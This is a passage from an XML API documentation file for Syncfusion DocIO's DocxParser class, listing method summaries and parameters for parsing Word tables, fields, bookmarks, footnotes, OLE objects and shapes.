            Parse the cell horizontal Merge
            </summary>
            <param name="reader"></param>
            <param name="cellFormat"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseCellVerticalAlignment(System.Xml.XmlReader)">
            <summary>
            Parse the cell vertical alignment
            </summary>
            <param name="reader">The Xmlreader</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.Parse2003CellDirection(System.Xml.XmlReader,Syncfusion.DocIO.DLS.CellFormat)">
            <summary>
            Parse the text direction of the cell from Word2003.
            </summary>
            <param name="reader">The xmlreader</param>
            <param name="cellFormat">The CellFormat</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseCellDirection(System.Xml.XmlReader,Syncfusion.DocIO.DLS.CellFormat)">
            <summary>
            Parse the text direction of the cell.
            </summary>
            <param name="reader">The xmlreader</param>
            <param name="cellFormat">The CellFormat</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseCellWidth(System.Xml.XmlReader,Syncfusion.DocIO.DLS.WTableCell)">
            <summary>
            Parse the cell Width
            </summary>
            <param name="reader"></param>
            <param name="cell"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.UpdateCellWidth(Syncfusion.DocIO.DLS.WTableCell)">
            <summary>
            Updates the width of the cell.
            </summary>
            <param name="cell">The cell.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.UpdateCellWidth(Syncfusion.DocIO.DLS.WTableCell,System.Int16)">
            <summary>
            Updates the width of the cell.
            </summary>
            <param name="cell">The cell.</param>
            <param name="gridSpan">The grid span.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseTableRowProperties(System.Xml.XmlReader,Syncfusion.DocIO.DLS.WTableRow)">
            <summary>
            Parse the Table row properties
            </summary>
            <param name="reader">The xml reader</param>
            <param name="tableRow">The table row.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseChangeRowFormat(System.Xml.XmlReader,Syncfusion.DocIO.DLS.WTableRow)">
            <summary>
            Parses the change row format
            </summary>
            <param name="reader"></param>
            <param name="tableRow"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.GetStringVal(System.Xml.XmlReader,System.String,System.String)">
            <summary>
            Gets the attribute value.
            </summary>
            <param name="reader">The reader.</param>
            <param name="attrName">Name of the attribute.</param>
            <param name="attrNS">The attribute namespace.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseRowHeight(System.Xml.XmlReader,Syncfusion.DocIO.DLS.WTableRow)">
            <summary>
            Parse the table row height
            </summary>
            <param name="reader">The xmlreader</param>
            <param name="tableRow">The table row</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ApplyTableProperties(Syncfusion.DocIO.DLS.WTableRow,Syncfusion.DocIO.DLS.WTable)">
            <summary>
            Applies table properties on table row.
            </summary>
            <param name="tblRow">The table row</param>
            <param name="tbl">The table</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.UpdateTableBorders(Syncfusion.DocIO.DLS.XmlTableFormat)">
            <summary>
            Updates the table borders.
            </summary>
            <param name="xmlFormat">The XML table format.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseTableProperties(System.Xml.XmlReader,Syncfusion.DocIO.DLS.IEntity)">
            <summary>
            Parse the table properties
            </summary>
            <param name="reader">The xmlreader</param>
            <param name="entity">The entity</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseChangeTableProperties(System.Xml.XmlReader,Syncfusion.DocIO.DLS.WTable)">
            <summary>
            Parses the change table properties
            </summary>
            <param name="reader">The xmlreader</param>
            <param name="table">The table</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseIntegerValue(System.String)">
            <summary>
            Converts the string to its corresponding Integer value
            </summary>
            <param name="value"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseTableTitle(System.Xml.XmlReader,Syncfusion.DocIO.DLS.WTable)">
            <summary>
            Parses the table title.
            </summary>
            <param name="reader">The reader.</param>
            <param name="table">The table.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseTableDescription(System.Xml.XmlReader,Syncfusion.DocIO.DLS.WTable)">
            <summary>
            Parses the table description.
            </summary>
            <param name="reader">The reader.</param>
            <param name="table">The table.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseTableLook(System.Xml.XmlReader,Syncfusion.DocIO.DLS.WTable)">
            <summary>
            Parses the table look.
            </summary>
            <param name="reader">The reader.</param>
            <param name="table">The table.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.GetBoolValue(System.String)">
            <summary>
            Gets the bool value.
            </summary>
            <param name="value">The value.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.GetBoolValue(System.Xml.XmlReader,System.String)">
            <summary>
            Get th
            </summary>
            <param name="reader"></param>
            <param name="nameSpace"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.GetTableLookValue(System.Xml.XmlReader,System.String)">
            <summary>
            Gets the table look value.
            </summary>
            <param name="reader">The reader.</param>
            <param name="name">The name.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseTableMargins(System.Xml.XmlReader,Syncfusion.DocIO.DLS.Paddings)">
            <summary>
            Parse the table margins
            </summary>
            <param name="reader"></param>
            <param name="paddings"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseTableMargins(System.Xml.XmlReader,Syncfusion.DocIO.DLS.IEntity)">
            <summary>
            Parse the table margins
            </summary>
            <param name="reader"></param>
            <param name="entity"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.GetPaddings(Syncfusion.DocIO.DLS.IEntity)">
            <summary>
            Get the corresponding paddings wrt the entity
            </summary>
            <param name="entity">The entity</param>
            <returns>The paddings</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseTableJustification(System.Xml.XmlReader)">
            <summary>
            Parse the table justification
            </summary>
            <param name="reader"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseTablePositioning(System.Xml.XmlReader,Syncfusion.DocIO.DLS.WTable)">
            <summary>
            Parses the table absolute positioning.
            </summary>
            <param name="reader">The reader.</param>
            <param name="table">The table.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseTableVerticalRelation(Syncfusion.DocIO.DLS.RowFormat.TablePositioning,System.String)">
            <summary>
            Parses the tables' vertical relation.
            </summary>
            <param name="positioning">The positioning.</param>
            <param name="position">The position.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseTableHorizontalRelation(Syncfusion.DocIO.DLS.RowFormat.TablePositioning,System.String)">
            <summary>
            Parses the table vertical relation.
            </summary>
            <param name="positioning">The positioning.</param>
            <param name="position">The position.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseTableHorizontalPosition(Syncfusion.DocIO.DLS.RowFormat.TablePositioning,System.String)">
            <summary>
            Parses the table absolute horizontal positioning.
            </summary>
            <param name="positioning">The positioning.</param>
            <param name="position">The position.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseTableVerticalPosition(Syncfusion.DocIO.DLS.RowFormat.TablePositioning,System.String)">
            <summary>
            Parses the tables' absolute horizontal positioning.
            </summary>
            <param name="positioning">The positioning.</param>
            <param name="position">The position.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseTableShading(System.Xml.XmlReader,Syncfusion.DocIO.DLS.RowFormat)">
            <summary>
            Parse the table shadings
            </summary>
            <param name="reader">The xml reader</param>
            <param name="format">The row format</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseTableLayout(System.Xml.XmlReader,Syncfusion.DocIO.DLS.RowFormat)">
            <summary>
            Parse the table layout element
            </summary>
            <param name="reader">The xmlreader</param>
            <param name="format">The rowformat</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseTableStyle(System.Xml.XmlReader,Syncfusion.DocIO.DLS.WTable)">
            <summary>
            Parse the table style element
            </summary>
            <param name="reader">The xmlreader</param>
            <param name="table">The table</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.GetRowFormat(Syncfusion.DocIO.DLS.IEntity)">
            <summary>
            Get the corresponding row format based on the entity
            </summary>
            <param name="entity">The entity</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseTableGrid(System.Xml.XmlReader,Syncfusion.DocIO.DLS.WTable,System.Boolean)">
            <summary>
            Parse the table grid element
            </summary>
            <param name="reader">The xml reader</param>
            <param name="table">The table</param>
            <param name="isTableGridChange"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.AddTable(Syncfusion.DocIO.DLS.IEntity)">
            <summary>
            Add a table to the corresponding the textbody
            </summary>
            <param name="entity"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseHyperlink(System.Xml.XmlReader,Syncfusion.DocIO.DLS.ParagraphItemCollection)">
            <summary>
            Parse the Hyperlink
            </summary>
            <param name="reader">The xml reader</param>
            <param name="para">The paragraph element</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.GetRelation(System.String)">
            <summary>
            Get the relation
            </summary>
            <param name="id">The relation id</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseHyperlinkText(System.Xml.XmlReader,Syncfusion.DocIO.DLS.ParagraphItemCollection)">
            <summary>
            Parses the hyperlink text.
            </summary>
            <param name="reader">The reader.</param>
            <param name="paragraph">The paragraph</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseFieldSimple(System.Xml.XmlReader,Syncfusion.DocIO.DLS.ParagraphItemCollection)">
            <summary>
            Parse the Field Simple
            </summary>
            <param name="reader">The xml reader</param>
            <param name="paragraph">The paragraph</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.GetBookmarkName(System.String)">
            <summary>
            Get the particular bookmark name by its ID from BookmarkInfo collection
            </summary>
            <param name="reader">The bookmark id.</param>
            <returns>The bookmark name</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.RemoveBookmarkName(System.String)">
            <summary>
            Removes the particular bookmark name by its ID from BookmarkInfo collection
            </summary>
            <param name="reader">The bookmark id.</param>     
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseBookmarkEnd(System.Xml.XmlReader,Syncfusion.DocIO.DLS.ParagraphItemCollection)">
            <summary>
            Parses the bookmark end.
            </summary>
            <param name="reader">The reader.</param>
            <param name="paraItems">The para items.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseBookmarkEnd(System.Xml.XmlReader,Syncfusion.DocIO.DLS.IEntity)">
            <summary>
            Parse the bookmark end element
            </summary>
            <param name="reader">The xml reader</param>
            <param name="ent">The entity</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.GetBookmarkParagraph(Syncfusion.DocIO.DLS.WTableCell)">
            <summary>
            Gets the paragraph which contains bookmark end.
            </summary>
            <param name="cell">The cell.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.GetBookmarkParagraph(Syncfusion.DocIO.DLS.WTableRow)">
            <summary>
            Gets the paragraph which contains bookmark end.
            </summary>
            <param name="cell">The cell.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseBookmarkStart(System.Xml.XmlReader,Syncfusion.DocIO.DLS.ParagraphItemCollection)">
            <summary>
            Parse the bookmark start element
            </summary>
            <param name="reader">The xml reader</param>
            <param name="paragraph">The paragraph</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseRun(System.Xml.XmlReader,Syncfusion.DocIO.DLS.ParagraphItemCollection)">
            <summary>
            Parse the run element
            </summary>
            <param name="reader">The xml reader</param>
            <param name="paragraph">The paragraph</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.GetShapeLineFillType(Syncfusion.DocIO.DLS.Shape)">
            <summary>
            Gets the Shape line fill tyoe
            </summary>
            <param name="shape">The shape</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ImportDocxPropsAndXMLRelation(Syncfusion.DocIO.DLS.ParagraphItem,Syncfusion.DocIO.DLS.ParagraphItem,System.IO.Stream)">
            <summary>
            
            </summary>
            <param name="choiceItem"></param>
            <param name="item"></param>
            <param name="shapeStream"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseAbsoluteTab(System.Xml.XmlReader)">
            <summary>
            Parses the Absolute tabs
            </summary>
            <param name="reader">The xml reader</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseFieldValue(System.Xml.XmlReader,Syncfusion.DocIO.DLS.ParagraphItemCollection)">
            <summary>
            Parse the field value
            </summary>
            <param name="reader">The xml reader</param>
            <param name="paragraph">The paragraph</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseFieldMark(System.Xml.XmlReader,Syncfusion.DocIO.DLS.ParagraphItemCollection)">
            <summary>
            Parse the field mark element
            </summary>
            <param name="reader">The xml reader</param>
            <param name="entity">The entity</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.HasFFData(System.IO.Stream)">
            <summary>
            Check whether ffData element is present as field mark child elements
            </summary>
            <param name="fieldNode"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.HasOleObject(System.IO.Stream)">
            <summary>
            Check whether Oleobject is present for skipping in Word 2003 XML
            </summary>
            <param name="fieldNode"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ProcessFieldMarkSeperator(Syncfusion.DocIO.DLS.ParagraphItemCollection)">
            <summary>
            Process the Field mark seperator
            </summary>
            <param name="para">The paragraph</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ProcessFieldMarkEnd(Syncfusion.DocIO.DLS.ParagraphItemCollection)">
            <summary>
            Process the field mark end
            </summary>
            <param name="para"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.InitFieldMarkBegin">
            <summary>
            Insert the begin - field mark 
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.GetFieldType(System.String)">
            <summary>
            Gets the field code.
            </summary>
            <param name="fieldCode">The field code.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.AppendFieldEndToImageHyperlink(Syncfusion.DocIO.DLS.ParagraphItem,Syncfusion.DocIO.DLS.ParagraphItemCollection)">
            <summary>
            Append Field End to Image if it has hyperlink
            </summary>
            <param name="item">Paragraph item (WPicture)</param>
            <param name="para">Paragraph</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseFieldData(System.Xml.XmlReader,Syncfusion.DocIO.DLS.ParagraphItemCollection)">
            <summary>
            Parse the form field's data
            </summary>
            <param name="reader">The xml reader</param>
            <param name="entity">The entity</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseFormField(System.Xml.XmlReader,Syncfusion.DocIO.DLS.WFormField)">
            <summary>
            Parse the form fields
            </summary>
            <param name="reader">The xml reader</param>
            <param name="formField">The Form field.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseDropDown(System.Xml.XmlReader,Syncfusion.DocIO.DLS.WDropDownFormField)">
            <summary>
            Parses the drop down form field.
            </summary>
            <param name="reader">The xml reader.</param>
            <param name="ent">The dropdown Form field</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseTextInput(System.Xml.XmlReader,Syncfusion.DocIO.DLS.WTextFormField)">
            <summary>
            Parses the textform field.
            </summary>
            <param name="reader">The xml reader.</param>
            <param name="textFormField">The textForm field</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.GetTextFormat(System.String)">
            <summary>
            Parses the text format.
            </summary>
            <param name="format">The format.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.GetTextFieldType(System.String)">
            <summary>
            Parses the type of the text formfield.
            </summary>
            <param name="type">The type.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseCheckBox(System.Xml.XmlReader,Syncfusion.DocIO.DLS.WCheckBox)">
            <summary>
            Parses the check box.
            </summary>
            <param name="reader">The xml reader.</param>
            <param name="checkBox">The Checkbox.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.GetFormField(System.IO.Stream)">
            <summary>
            Gets the form field object.
            </summary>
            <param name="node">The node.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.IsFormField">
            <summary>
            Determines whether the field is form field.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.Parse2003FootnotePart(System.Xml.XmlReader,System.Boolean)">
            <summary>
            Parse the Footnote/Endnote part from Word2003.
            </summary>
            <param name="reader">the reader</param>
            <param name="isFootnote">is Footnote</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseFootnotePart(System.Boolean)">
            <summary>
            Parse the Footnote.xml / Endnote.xml part
            </summary>
            <param name="isFootnote">Bool flag to denote footnote or endnote</param>
            <param name="tableRow">The table row.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseFootnote(System.Xml.XmlReader)">
            <summary>
            Parses the footnote endnote.
            </summary>
            <param name="reader">The reader.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.GetFootnote(System.Boolean,System.String)">
            <summary>
            Gets the footnote by ID.
            </summary>
            <param name="isFootnote">if it is footnote, set to <c>true</c>.</param>
            <param name="id">The id.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseFootnoteSymbol(System.Xml.XmlReader,Syncfusion.DocIO.DLS.WFootnote)">
            <summary>
            Parses the footnote entnote symbol.
            </summary>
            <param name="reader">The reader.</param>
            <param name="footnote">The footnote.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.MoveToNextLine(System.Xml.XmlReader)">
            <summary>
            Moves to next line.
            </summary>
            <param name="reader">The reader.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseFootnoteMarker">
            <summary>
            
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseObject(System.Xml.XmlReader)">
            <summary>
            Parse the objects
            </summary>
            <param name="reader"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseOleObject(System.IO.Stream)">
            <summary>
            Parse the ole object
            </summary>
            <param name="objectStream"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseOlePictureWrapStyle(System.Xml.XmlReader,Syncfusion.DocIO.DLS.WPicture)">
            <summary>
            Parse the ole objects picture wrapping style.
            </summary>
            <param name="objectStream"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseOleData(System.Xml.XmlReader,Syncfusion.DocIO.DLS.WOleObject)">
            <summary>
            Parse the ole data
            </summary>
            <param name="reader"></param>
            <param name="oleObject"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.GetOlePart(System.String)">
            <summary>
            Gets the OLE part.
            </summary>
            <param name="oleId">The OLE id.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.GetOleLinkPath(System.String)">
            <summary>
            Gets the OLE link path.
            </summary>
            <param name="id">The id.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.IsNativeDataInside(Syncfusion.DocIO.DLS.OleObjectType)">
            <summary>
            Determines whether the container is the native data.
            </summary>
            <param name="type">The type.</param>
            <returns>
            	<c>true</c> if the container is the native data; otherwise, <c>false</c>.
            </returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.HasNode(System.IO.Stream,System.String)">
            <summary>
            Check whether the mentioned node exists or not
            </summary>
            <param name="objectStream"></param>
            <param name="elementName"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseShape(System.Xml.XmlReader,Syncfusion.DocIO.DLS.ParagraphItemCollection,System.IO.MemoryStream,System.IO.MemoryStream)">
            <summary>
            Parses the shape
            </summary>
            <param name="reader">The xml reader</param>
            <param name="paraItems">The Paragraph Items</param>
            <param name="drawingStream">The Drawing stream.</param>
            <param name="memoryStream">Memory Stream</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseDocx2007Extrusion(Syncfusion.DocIO.DLS.Shape,System.IO.Stream)">
            <summary>
            Parses the Extrusion Effect(TheeD effect in 2007 format document)
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.GetPropertyValue(System.String)">
            <summary>
            Gets the Extrusion value
            </summary>
            <param name="value">The value</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseExtrusionAxis(Syncfusion.DocIO.DLS.EffectFormat,System.String,System.String)">
            <summary>
            Gets the Extrusion Axis
            </summary>
            <param name="effectFormat">The Effect Format</param>
            <param name="value" >The attribute value</param>
            <param name="attribute">Attribute name</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseDocx2007ShadowEffect(Syncfusion.DocIO.DLS.Shape,System.IO.Stream)">
            <summary>
            Parse shape 2007 shadow effect
            </summary>
            <param name="shape">The Shape</param>
            <param name="shadowStream">The Shadow Stream</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseShadowOffsets(Syncfusion.DocIO.DLS.EffectFormat,System.String,System.String)">
            <summary>
            Gets the shadow offsets
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseFillOffsets(Syncfusion.DocIO.DLS.FillFormat,System.String,System.String)">
            <summary>
            Parse the Fill offsets
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.GetEffectsPointValue(System.String)">
            <summary>
            Gets the point value.
            </summary>
            <param name="value"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.GetShadowType(System.String)">
            <summary>
            Gets the shadow type.
            </summary>
            <param name="value">Shadow Type</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseXMLRelations(Syncfusion.DocIO.DLS.Shape,System.IO.MemoryStream)">
            <summary>
            Parses the Xml Relations.
            </summary>
            <param name="shape">The Shape</param>
            <param name="shapeStream">The shape stream</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseShape(System.IO.MemoryStream,System.IO.MemoryStream)">
            <summary>
            Parse the shape
            </summary>
            <param name="shapeStream">Shape Stream</param>
            <param name="drawingStream">The drawing stream.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.Parse2007Shape(System.Xml.XmlReader,Syncfusion.DocIO.DLS.Shape)">
            <summary>
            Parses 2007 Shapes
            </summary>
            <param name="reader">The xml reader</param>
            <param name="shape">The Shape</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseTextBoxWrapStyle(System.Xml.XmlReader,Syncfusion.DocIO.DLS.Shape)">
            <summary>
            Parses Textbox Wrap Style
            </summary>
            <param name="reader">The xml reader</param>
            <param name="shape">The Shape.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseTextbox(System.Xml.XmlReader,Syncfusion.DocIO.DLS.Shape)">
            <summary>
            Parse the TextBox
            </summary>
            <param name="reader">The xml reader</param>
            <param name="Shape">The Shape</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseFillEffects(System.Xml.XmlReader,Syncfusion.DocIO.DLS.Shape)">
            <summary>
            Parses 2007 shape Fill effect
            </summary>
            <param name="reader">The reader.</param>
            <param name="shape">The Shape</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.GetOpacityValue(System.String)">
            <summary>
            Parses the 2007 shape fill transparency
            </summary>
            <param name="value">The opacity value.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.GetAngle(System.String)">
            <summary>
            Gets the angle
            </summary>
            <param name="angle">The angle value.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.Parse2007GradientFill(System.Xml.XmlReader,Syncfusion.DocIO.DLS.GradientFill)">
            <summary>
            Parses the 2007 gradient fill
            </summary>
            <param name="reader">The reader.</param>
            <param name="gradientFill">The Gradient Fill.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseFocusPosition(System.Xml.XmlReader,Syncfusion.DocIO.DLS.GradientFill)">
            <summary>
            Parses the focus position for the gradient fill of the shape the Table row properties
            </summary>
            <param name="reader">The xml reader</param>
            <param name="gradientFill">The Gradient Fill.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseTextBoxStyle(System.Xml.XmlReader,Syncfusion.DocIO.DLS.Shape)">
            <summary>
            To Get the textbox's style
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.GetTextDirection(System.String)">
            <summary>
            To Get the shape/textbox's text direction
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.GetBaseEntity(Syncfusion.DocIO.DLS.Entity)">
            <summary>
            Get the base entity
            </summary>
            <param name="entity"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseTextWatermark(System.IO.Stream)">
            <summary>
            Parses the text watermark.
            </summary>
            <param name="node">The node.</param>
            <param name="ent">The ent.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseTextWatermarkPosition(System.Xml.XmlReader,Syncfusion.DocIO.DLS.TextWatermark)">
            <summary>
            Parses the watermark position.
            </summary>
            <param name="reader">The reader.</param>
            <param name="water">The water.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseTextWatermarkStyleAndSize(System.Xml.XmlReader,Syncfusion.DocIO.DLS.TextWatermark,System.Int32,System.Int32)">
            <summary>
            Parses the size of the font name and.
            </summary>
            <param name="reader">The reader.</param>
            <param name="ent">The ent.</param>
            <param name="shapeH">The shape H.</param>
            <param name="shapeW">The shape W.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.FindElementValue(System.IO.Stream,System.String,System.String)">
            <summary>
            To find the element by its value
            </summary>
            <param name="stream"></param>
            <param name="elementName"></param>
            <param name="namspace"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParsePictureShape(System.IO.MemoryStream)">
            <summary>
            Parses the picture shape from stream.
            </summary>
            <param name="shapeStream">The shape stream.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParsePictureShape(System.Xml.XmlReader,Syncfusion.DocIO.DLS.IEntity)">
            <summary>
            Parses the picture shape from reader.
            </summary>
            <param name="reader">The reader.</param>
            <param name="entity">The entity.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.Read2003ImageBase64String(System.Xml.XmlReader)">
            <summary>
            Read the binData element string which contain Image in base 64 fomrat
            </summary>
            <param name="reader"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.GetCroppingValues(System.String)">
            <summary>
            Gets the crop value
            </summary>
            <param name="value"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseStrokeProps(System.Xml.XmlReader,Syncfusion.DocIO.DLS.InlineShapeObject)">
            <summary>
            Parses the stroke props.
            </summary>
            <param name="reader">The reader.</param>
            <param name="shape">The shape.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.GetLineJoinStyle(System.String)">
            <summary>
            Gets the line join style.
            </summary>
